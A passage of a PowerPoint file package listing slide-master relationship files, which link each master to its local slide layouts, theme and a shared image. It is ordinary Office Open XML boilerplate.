Target="../slideLayouts/slideLayout1152.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme116.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1160.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1151.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster117.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1169.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1168.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1167.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1166.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1165.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1164.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1163.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1162.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme117.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1170.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1161.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster118.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1179.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1178.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1177.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1176.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1175.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1174.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1173.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1172.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme118.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1180.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1171.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster119.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1189.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1188.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1187.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1186.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1185.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1184.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1183.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1182.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme119.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1190.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1181.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster12.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout119.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout118.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout117.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout116.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout115.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout114.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout113.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout112.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme12.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout120.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout111.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster120.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1199.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1198.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1197.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1196.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1195.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1194.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1193.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1192.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme120.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1200.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1191.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster121.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1209.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1208.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1207.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1206.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1205.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1204.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1203.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1202.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme121.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1210.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1201.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster122.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1219.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1218.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1217.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1216.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1215.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1214.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1213.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1212.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme122.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1220.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1211.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster123.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1229.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1228.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1227.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1226.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1225.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1224.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1223.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1222.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme123.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1230.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1221.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster124.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1239.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1238.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1237.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1236.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1235.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1234.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1233.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1232.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme124.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1240.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1231.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster125.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1249.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1248.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1247.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1246.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1245.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1244.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1243.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1242.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme125.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1250.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1241.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster126.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1259.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1258.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1257.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1256.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1255.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1254.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1253.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1252.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme126.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1260.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1251.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster127.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1269.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1268.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1267.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1266.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1265.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1264.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1263.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1262.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme127.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1270.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1261.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster128.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1279.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1278.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1277.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1276.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1275.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1274.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1273.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1272.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme128.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1280.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1271.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster129.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1289.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1288.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1287.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1286.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1285.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1284.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1283.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1282.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme129.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1290.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1281.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster13.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout129.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout128.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout127.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout126.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout125.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout124.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout123.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout122.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme13.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout130.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout121.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster130.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1299.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1298.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1297.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1296.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1295.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" 